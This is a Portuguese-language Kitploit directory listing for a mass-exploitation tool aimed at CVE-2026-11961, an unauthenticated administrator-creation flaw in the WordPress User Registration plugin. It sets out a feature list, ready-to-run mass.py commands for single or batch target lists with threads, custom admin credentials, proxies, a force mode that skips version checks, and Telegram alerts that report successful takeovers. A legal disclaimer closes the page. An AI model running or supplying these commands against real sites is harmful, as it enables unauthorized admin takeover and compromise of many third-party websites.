Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalação de Privilégios. Funções de Associação mal configuradas → Criação de Administrador Não Autenticado → Comprometimento do Site. CVSS 8.1 | Kitploit
Ferramentas/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
Escalada de PrivilégiosScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoConfiguração Incorreta

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalação de Privilégios. Funções de Associação mal configuradas → Criação de Administrador Não Autenticado → Comprometimento do Site. CVSS 8.1

Ver Repositório
16há 1 mêsAinda não revisado
Compartilhar

CVE-2026-11961

Ferramenta de exploit em massa para CVE-2026-11961 que afeta o plugin User Registration & Membership do WordPress.

Recursos

  • Detecção de versão do plugin
  • Suporte a alvo único
  • Processamento em lote de alvos
  • Suporte a múltiplas threads
  • Credenciais aleatórias ou personalizadas
  • Suporte a proxy HTTP/HTTPS
  • Configuração de tempo limite de solicitação
  • Saída JSONL
  • Suporte a arquivo de log
  • Notificações via Telegram
  • Modo forçado (--force)

Uso

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

Opções

OptionDescription
-h, --helpExibe a mensagem de ajuda e sai
-u, --urlURL do alvo único
-l, --listArquivo contendo URLs de alvos (uma por linha)
--usernameNome de usuário do administrador (padrão: gerado aleatoriamente)
--passwordSenha do administrador (padrão: gerada aleatoriamente)
-t, --threadsNúmero de threads simultâneas (padrão: 5)
--timeoutTempo limite de solicitação em segundos (padrão: 15)
-o, --outputSalva os resultados bem-sucedidos em um arquivo JSONL
--logSalva os logs do console em um arquivo
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
--forceIgnora a validação de versão e continua o processamento
--tg-tokenToken do Bot do Telegram
--tg-chatID do Chat do Telegram

Aviso Legal

Este projeto é fornecido exclusivamente para avaliações de segurança autorizadas, pesquisa defensiva de segurança e validação de vulnerabilidades.

Ao utilizar este software, você confirma que possui autorização explícita para avaliar os sistemas-alvo. O acesso não autorizado a sistemas de computador é proibido e pode violar as leis aplicáveis.

O autor e os colaboradores não incentivam nem toleram o uso não autorizado deste projeto e não assumem nenhuma responsabilidade ou obrigação por qualquer uso indevido, dano ou consequências legais decorrentes de seu uso.

Autor

JohenLastGen JLG NETWORK

Baixar ferramenta